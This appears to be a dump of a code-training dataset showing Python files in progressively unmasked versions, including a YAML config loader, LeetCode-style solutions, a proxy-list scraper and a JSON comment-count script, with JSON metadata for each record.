"step-5": "#!/usr/bin/python\n# encoding=utf-8\n\n\"\"\"\n@Author : Don\n@Date : 9/16/2020 1:40 PM\n@Desc : \n\"\"\"\nimport os\n\nimport yaml\n\nconfig_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"config.yaml\")\n\nwith open(config_path, \"r\", encoding=\"utf-8\") as f:\n conf = yaml.load(f.read(), Loader=yaml.FullLoader)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def buddyStrings(self, A: str, B: str) ->bool:
if len(A) != len(B):
return False
if A == B and len(A) > len(set(A)):
return True
re1 = ''
re2 = ''
for i in range(len(A)):
if A[i] != B[i]:
re1 += A[i]
re2 += B[i]
if len(re1) == len(re2) == 2 and re1 == re2[::-1]:
return True
return False
<|reserved_special_token_1|>
"""
Given two strings A and B of lowercase letters, return true
if and only if we can swap two letters in A so that the result
equals B.
Example 1:
Input: A = "ab", B = "ba"
Output: true
"""
class Solution:
def buddyStrings(self, A: str, B: str) -> bool:
if len(A) != len(B):
return False
if A == B and len(A) > len(set(A)):
return True
re1 = ""
re2 = ""
for i in range(len(A)):
if A[i] != B[i]:
re1 += A[i]
re2 += B[i]
if len(re1) == len(re2) == 2 and re1 == re2[::-1]:
return True
return False
|
flexible
|
{
"blob_id": "dd902f99ee8dc23f56641b8e75544a2d4576c19a",
"index": 4437,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def buddyStrings(self, A: str, B: str) ->bool:\n if len(A) != len(B):\n return False\n if A == B and len(A) > len(set(A)):\n return True\n re1 = ''\n re2 = ''\n for i in range(len(A)):\n if A[i] != B[i]:\n re1 += A[i]\n re2 += B[i]\n if len(re1) == len(re2) == 2 and re1 == re2[::-1]:\n return True\n return False\n",
"step-4": "\"\"\"\nGiven two strings A and B of lowercase letters, return true \nif and only if we can swap two letters in A so that the result \nequals B.\n\n Example 1:\n\n Input: A = \"ab\", B = \"ba\"\n Output: true\n\"\"\"\n\nclass Solution:\n def buddyStrings(self, A: str, B: str) -> bool:\n if len(A) != len(B):\n return False\n \n if A == B and len(A) > len(set(A)):\n return True\n \n re1 = \"\"\n re2 = \"\"\n for i in range(len(A)):\n if A[i] != B[i]:\n re1 += A[i]\n re2 += B[i] \n \n if len(re1) == len(re2) == 2 and re1 == re2[::-1]: \n return True\n \n return False\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
__author__ = 'Administrator'
# 抓取IP的主要逻辑
from urllib import request
import urllib.parse
import logging
from multiprocessing import pool
from time import sleep
import random
from lxml import etree
def getRandomUserAgnet():
user_agents=[
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 QIHU 360S"
]
userAgent=random.choice(user_agents)
return userAgent
def getProxies():
proxies=[]
for i in range(1,10):
url="http://www.xicidaili.com/nn/{0}".format(i)
userAgent=getRandomUserAgnet()
headers={"User-Agent":userAgent}
opener=urllib.request.build_opener()
opener.addheaders=[headers]
try:
data=opener.open(url,timeout=5).read()
sleep(3)
except Exception as e:
logging.debug(e)
selector=etree.HTML(data)
ip_addr=selector.xpath("//tr[@class='odd']/td[2]/text()")
port=selector.xpath("//tr[@class='odd']/td[3]/text()")
sur_time=selector.xpath("//tr[@class='odd']/td[9]/text()")
ver_time=selector.xpath("//tr[@class='odd']/td[10]/text()")
for j in range(len(ip_addr)):
ip=ip_addr[j]+":"+port[j]
proxies.append(ip)
return proxies
def verify_ip(currentIp):
tmp_proxies=[]
testUrl="http://www.baidu.com"
userAgent=getRandomUserAgnet()
proxy_support=urllib.request.ProxyHandler({"http":currentIp})
opener=urllib.request.build_opener(proxy_support)
opener.addheaders=[("User-Agent",userAgent)]
urllib.request.install_opener(opener)
try:
res=urllib.request.urlopen(testUrl,timeout=5).read()
if len(res)!=0:
tmp_proxies.append(currentIp)
except urllib.error.URLError as er2:
if hasattr(er2,'code'):
logging.debug("unvalid ipaddress"+currentIp+str(er2.code))
if hasattr(er2,"reason"):
logging.debug("reason is the "+currentIp+str(er2.reason))
except Exception as er:
logging.debug(er)
sleep(2)
return tmp_proxies
if __name__=="__main__":
getProxies()
|
normal
|
{
"blob_id": "911631e96d21bdf22a219007f1bdc04a5e6965dc",
"index": 739,
"step-1": "<mask token>\n\n\ndef getRandomUserAgnet():\n user_agents = [\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 QIHU 360S'\n ]\n userAgent = random.choice(user_agents)\n return userAgent\n\n\ndef getProxies():\n proxies = []\n for i in range(1, 10):\n url = 'http://www.xicidaili.com/nn/{0}'.format(i)\n userAgent = getRandomUserAgnet()\n headers = {'User-Agent': userAgent}\n opener = urllib.request.build_opener()\n opener.addheaders = [headers]\n try:\n data = opener.open(url, timeout=5).read()\n sleep(3)\n except Exception as e:\n logging.debug(e)\n selector = etree.HTML(data)\n ip_addr = selector.xpath(\"//tr[@class='odd']/td[2]/text()\")\n port = selector.xpath(\"//tr[@class='odd']/td[3]/text()\")\n sur_time = selector.xpath(\"//tr[@class='odd']/td[9]/text()\")\n ver_time = selector.xpath(\"//tr[@class='odd']/td[10]/text()\")\n for j in range(len(ip_addr)):\n ip = ip_addr[j] + ':' + port[j]\n proxies.append(ip)\n return proxies\n\n\ndef verify_ip(currentIp):\n tmp_proxies = []\n testUrl = 'http://www.baidu.com'\n userAgent = getRandomUserAgnet()\n proxy_support = urllib.request.ProxyHandler({'http': currentIp})\n opener = urllib.request.build_opener(proxy_support)\n opener.addheaders = [('User-Agent', userAgent)]\n urllib.request.install_opener(opener)\n try:\n res = urllib.request.urlopen(testUrl, timeout=5).read()\n if len(res) != 0:\n tmp_proxies.append(currentIp)\n except urllib.error.URLError as er2:\n if hasattr(er2, 'code'):\n logging.debug('unvalid ipaddress' + currentIp + str(er2.code))\n if hasattr(er2, 'reason'):\n logging.debug('reason is the ' + currentIp + str(er2.reason))\n except Exception as er:\n logging.debug(er)\n sleep(2)\n return tmp_proxies\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef getRandomUserAgnet():\n user_agents = [\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 QIHU 360S'\n ]\n userAgent = random.choice(user_agents)\n return userAgent\n\n\ndef getProxies():\n proxies = []\n for i in range(1, 10):\n url = 'http://www.xicidaili.com/nn/{0}'.format(i)\n userAgent = getRandomUserAgnet()\n headers = {'User-Agent': userAgent}\n opener = urllib.request.build_opener()\n opener.addheaders = [headers]\n try:\n data = opener.open(url, timeout=5).read()\n sleep(3)\n except Exception as e:\n logging.debug(e)\n selector = etree.HTML(data)\n ip_addr = selector.xpath(\"//tr[@class='odd']/td[2]/text()\")\n port = selector.xpath(\"//tr[@class='odd']/td[3]/text()\")\n sur_time = selector.xpath(\"//tr[@class='odd']/td[9]/text()\")\n ver_time = selector.xpath(\"//tr[@class='odd']/td[10]/text()\")\n for j in range(len(ip_addr)):\n ip = ip_addr[j] + ':' + port[j]\n proxies.append(ip)\n return proxies\n\n\ndef verify_ip(currentIp):\n tmp_proxies = []\n testUrl = 'http://www.baidu.com'\n userAgent = getRandomUserAgnet()\n proxy_support = urllib.request.ProxyHandler({'http': currentIp})\n opener = urllib.request.build_opener(proxy_support)\n opener.addheaders = [('User-Agent', userAgent)]\n urllib.request.install_opener(opener)\n try:\n res = urllib.request.urlopen(testUrl, timeout=5).read()\n if len(res) != 0:\n tmp_proxies.append(currentIp)\n except urllib.error.URLError as er2:\n if hasattr(er2, 'code'):\n logging.debug('unvalid ipaddress' + currentIp + str(er2.code))\n if hasattr(er2, 'reason'):\n logging.debug('reason is the ' + currentIp + str(er2.reason))\n except Exception as er:\n logging.debug(er)\n sleep(2)\n return tmp_proxies\n\n\nif __name__ == '__main__':\n getProxies()\n",
"step-3": "__author__ = 'Administrator'\n<mask token>\n\n\ndef getRandomUserAgnet():\n user_agents = [\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 QIHU 360S'\n ]\n userAgent = random.choice(user_agents)\n return userAgent\n\n\ndef getProxies():\n proxies = []\n for i in range(1, 10):\n url = 'http://www.xicidaili.com/nn/{0}'.format(i)\n userAgent = getRandomUserAgnet()\n headers = {'User-Agent': userAgent}\n opener = urllib.request.build_opener()\n opener.addheaders = [headers]\n try:\n data = opener.open(url, timeout=5).read()\n sleep(3)\n except Exception as e:\n logging.debug(e)\n selector = etree.HTML(data)\n ip_addr = selector.xpath(\"//tr[@class='odd']/td[2]/text()\")\n port = selector.xpath(\"//tr[@class='odd']/td[3]/text()\")\n sur_time = selector.xpath(\"//tr[@class='odd']/td[9]/text()\")\n ver_time = selector.xpath(\"//tr[@class='odd']/td[10]/text()\")\n for j in range(len(ip_addr)):\n ip = ip_addr[j] + ':' + port[j]\n proxies.append(ip)\n return proxies\n\n\ndef verify_ip(currentIp):\n tmp_proxies = []\n testUrl = 'http://www.baidu.com'\n userAgent = getRandomUserAgnet()\n proxy_support = urllib.request.ProxyHandler({'http': currentIp})\n opener = urllib.request.build_opener(proxy_support)\n opener.addheaders = [('User-Agent', userAgent)]\n urllib.request.install_opener(opener)\n try:\n res = urllib.request.urlopen(testUrl, timeout=5).read()\n if len(res) != 0:\n tmp_proxies.append(currentIp)\n except urllib.error.URLError as er2:\n if hasattr(er2, 'code'):\n logging.debug('unvalid ipaddress' + currentIp + str(er2.code))\n if hasattr(er2, 'reason'):\n logging.debug('reason is the ' + currentIp + str(er2.reason))\n except Exception as er:\n logging.debug(er)\n sleep(2)\n return tmp_proxies\n\n\nif __name__ == '__main__':\n getProxies()\n",
"step-4": "__author__ = 'Administrator'\nfrom urllib import request\nimport urllib.parse\nimport logging\nfrom multiprocessing import pool\nfrom time import sleep\nimport random\nfrom lxml import etree\n\n\ndef getRandomUserAgnet():\n user_agents = [\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 QIHU 360S'\n ]\n userAgent = random.choice(user_agents)\n return userAgent\n\n\ndef getProxies():\n proxies = []\n for i in range(1, 10):\n url = 'http://www.xicidaili.com/nn/{0}'.format(i)\n userAgent = getRandomUserAgnet()\n headers = {'User-Agent': userAgent}\n opener = urllib.request.build_opener()\n opener.addheaders = [headers]\n try:\n data = opener.open(url, timeout=5).read()\n sleep(3)\n except Exception as e:\n logging.debug(e)\n selector = etree.HTML(data)\n ip_addr = selector.xpath(\"//tr[@class='odd']/td[2]/text()\")\n port = selector.xpath(\"//tr[@class='odd']/td[3]/text()\")\n sur_time = selector.xpath(\"//tr[@class='odd']/td[9]/text()\")\n ver_time = selector.xpath(\"//tr[@class='odd']/td[10]/text()\")\n for j in range(len(ip_addr)):\n ip = ip_addr[j] + ':' + port[j]\n proxies.append(ip)\n return proxies\n\n\ndef verify_ip(currentIp):\n tmp_proxies = []\n testUrl = 'http://www.baidu.com'\n userAgent = getRandomUserAgnet()\n proxy_support = urllib.request.ProxyHandler({'http': currentIp})\n opener = urllib.request.build_opener(proxy_support)\n opener.addheaders = [('User-Agent', userAgent)]\n urllib.request.install_opener(opener)\n try:\n res = urllib.request.urlopen(testUrl, timeout=5).read()\n if len(res) != 0:\n tmp_proxies.append(currentIp)\n except urllib.error.URLError as er2:\n if hasattr(er2, 'code'):\n logging.debug('unvalid ipaddress' + currentIp + str(er2.code))\n if hasattr(er2, 'reason'):\n logging.debug('reason is the ' + currentIp + str(er2.reason))\n except Exception as er:\n logging.debug(er)\n sleep(2)\n return tmp_proxies\n\n\nif __name__ == '__main__':\n getProxies()\n",
"step-5": "__author__ = 'Administrator'\n# 抓取IP的主要逻辑\nfrom urllib import request\nimport urllib.parse\nimport logging\nfrom multiprocessing import pool\nfrom time import sleep\nimport random\nfrom lxml import etree\ndef getRandomUserAgnet():\n user_agents=[\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 QIHU 360S\"\n ]\n userAgent=random.choice(user_agents)\n return userAgent\ndef getProxies():\n proxies=[]\n for i in range(1,10):\n url=\"http://www.xicidaili.com/nn/{0}\".format(i)\n userAgent=getRandomUserAgnet()\n headers={\"User-Agent\":userAgent}\n opener=urllib.request.build_opener()\n opener.addheaders=[headers]\n try:\n data=opener.open(url,timeout=5).read()\n sleep(3)\n except Exception as e:\n logging.debug(e)\n selector=etree.HTML(data)\n ip_addr=selector.xpath(\"//tr[@class='odd']/td[2]/text()\")\n port=selector.xpath(\"//tr[@class='odd']/td[3]/text()\")\n sur_time=selector.xpath(\"//tr[@class='odd']/td[9]/text()\")\n ver_time=selector.xpath(\"//tr[@class='odd']/td[10]/text()\")\n for j in range(len(ip_addr)):\n ip=ip_addr[j]+\":\"+port[j]\n proxies.append(ip)\n return proxies\ndef verify_ip(currentIp):\n tmp_proxies=[]\n testUrl=\"http://www.baidu.com\"\n userAgent=getRandomUserAgnet()\n proxy_support=urllib.request.ProxyHandler({\"http\":currentIp})\n opener=urllib.request.build_opener(proxy_support)\n opener.addheaders=[(\"User-Agent\",userAgent)]\n urllib.request.install_opener(opener)\n try:\n res=urllib.request.urlopen(testUrl,timeout=5).read()\n if len(res)!=0:\n tmp_proxies.append(currentIp)\n except urllib.error.URLError as er2:\n if hasattr(er2,'code'):\n logging.debug(\"unvalid ipaddress\"+currentIp+str(er2.code))\n if hasattr(er2,\"reason\"):\n logging.debug(\"reason is the \"+currentIp+str(er2.reason))\n except Exception as er:\n logging.debug(er)\n sleep(2)\n return tmp_proxies\nif __name__==\"__main__\":\n getProxies()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def minDominoRotations(self, A: List[int], B: List[int]) ->int:
if not A or not B:
return 0
if len(A) != len(B):
return -1
cnt_a, cnt_b = Counter(A), Counter(B)
check_list = []
for num, freq in cnt_a.items():
check_list.append((freq, num, 'a'))
for num, freq in cnt_b.items():
check_list.append((freq, num, 'b'))
check_list.sort(reverse=True)
cnt = 0
for freq, target, lst in check_list:
if lst == 'a':
to_list, from_list = A, B
else:
to_list, from_list = B, A
invalid = False
for i in range(len(A)):
if to_list[i] == target:
continue
if from_list[i] != target:
invalid = True
break
cnt += 1
if not invalid:
return cnt
return -1
<|reserved_special_token_1|>
from collections import Counter
class Solution:
def minDominoRotations(self, A: List[int], B: List[int]) ->int:
if not A or not B:
return 0
if len(A) != len(B):
return -1
cnt_a, cnt_b = Counter(A), Counter(B)
check_list = []
for num, freq in cnt_a.items():
check_list.append((freq, num, 'a'))
for num, freq in cnt_b.items():
check_list.append((freq, num, 'b'))
check_list.sort(reverse=True)
cnt = 0
for freq, target, lst in check_list:
if lst == 'a':
to_list, from_list = A, B
else:
to_list, from_list = B, A
invalid = False
for i in range(len(A)):
if to_list[i] == target:
continue
if from_list[i] != target:
invalid = True
break
cnt += 1
if not invalid:
return cnt
return -1
|
flexible
|
{
"blob_id": "069d85370d8358aa884b5195a1b52c0014efd161",
"index": 7637,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def minDominoRotations(self, A: List[int], B: List[int]) ->int:\n if not A or not B:\n return 0\n if len(A) != len(B):\n return -1\n cnt_a, cnt_b = Counter(A), Counter(B)\n check_list = []\n for num, freq in cnt_a.items():\n check_list.append((freq, num, 'a'))\n for num, freq in cnt_b.items():\n check_list.append((freq, num, 'b'))\n check_list.sort(reverse=True)\n cnt = 0\n for freq, target, lst in check_list:\n if lst == 'a':\n to_list, from_list = A, B\n else:\n to_list, from_list = B, A\n invalid = False\n for i in range(len(A)):\n if to_list[i] == target:\n continue\n if from_list[i] != target:\n invalid = True\n break\n cnt += 1\n if not invalid:\n return cnt\n return -1\n",
"step-4": "from collections import Counter\n\n\nclass Solution:\n\n def minDominoRotations(self, A: List[int], B: List[int]) ->int:\n if not A or not B:\n return 0\n if len(A) != len(B):\n return -1\n cnt_a, cnt_b = Counter(A), Counter(B)\n check_list = []\n for num, freq in cnt_a.items():\n check_list.append((freq, num, 'a'))\n for num, freq in cnt_b.items():\n check_list.append((freq, num, 'b'))\n check_list.sort(reverse=True)\n cnt = 0\n for freq, target, lst in check_list:\n if lst == 'a':\n to_list, from_list = A, B\n else:\n to_list, from_list = B, A\n invalid = False\n for i in range(len(A)):\n if to_list[i] == target:\n continue\n if from_list[i] != target:\n invalid = True\n break\n cnt += 1\n if not invalid:\n return cnt\n return -1\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import json
import urllib
while True:
# Get input URL
url = raw_input("Enter URL: ")
# Check valid input
if len(url) < 1:
break
# Get data
print("Retrieving", url)
connection = urllib.urlopen(url)
data = connection.read()
print("Retrieved", len(data), "characters")
# Parse and deserialize
try:
js = json.loads(str(data))
except:
js = None
print(json.dumps(js, indent=4))
comments = js["comments"]
result = 0
for comment in comments:
result += comment["count"]
print("\n")
print("Result = {}".format(result))
|
normal
|
{
"blob_id": "4cdd5fc15096aac01ad6d97d38ef7397859de18b",
"index": 5470,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile True:\n url = raw_input('Enter URL: ')\n if len(url) < 1:\n break\n print('Retrieving', url)\n connection = urllib.urlopen(url)\n data = connection.read()\n print('Retrieved', len(data), 'characters')\n try:\n js = json.loads(str(data))\n except:\n js = None\n print(json.dumps(js, indent=4))\n comments = js['comments']\n result = 0\n for comment in comments:\n result += comment['count']\n print('\\n')\n print('Result = {}'.format(result))\n",
"step-3": "import json\nimport urllib\nwhile True:\n url = raw_input('Enter URL: ')\n if len(url) < 1:\n break\n print('Retrieving', url)\n connection = urllib.urlopen(url)\n data = connection.read()\n print('Retrieved', len(data), 'characters')\n try:\n js = json.loads(str(data))\n except:\n js = None\n print(json.dumps(js, indent=4))\n comments = js['comments']\n result = 0\n for comment in comments:\n result += comment['count']\n print('\\n')\n print('Result = {}'.format(result))\n",
"step-4": "import json\nimport urllib\n\nwhile True:\n # Get input URL\n url = raw_input(\"Enter URL: \")\n # Check valid input\n if len(url) < 1:\n break\n\n # Get data\n print(\"Retrieving\", url)\n connection = urllib.urlopen(url)\n data = connection.read()\n print(\"Retrieved\", len(data), \"characters\")\n\n # Parse and deserialize\n try:\n js = json.loads(str(data))\n except:\n js = None\n \n print(json.dumps(js, indent=4))\n\n comments = js[\"comments\"]\n\n result = 0\n\n for comment in comments:\n result += comment[\"count\"]\n\n print(\"\\n\")\n print(\"Result = {}\".format(result))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.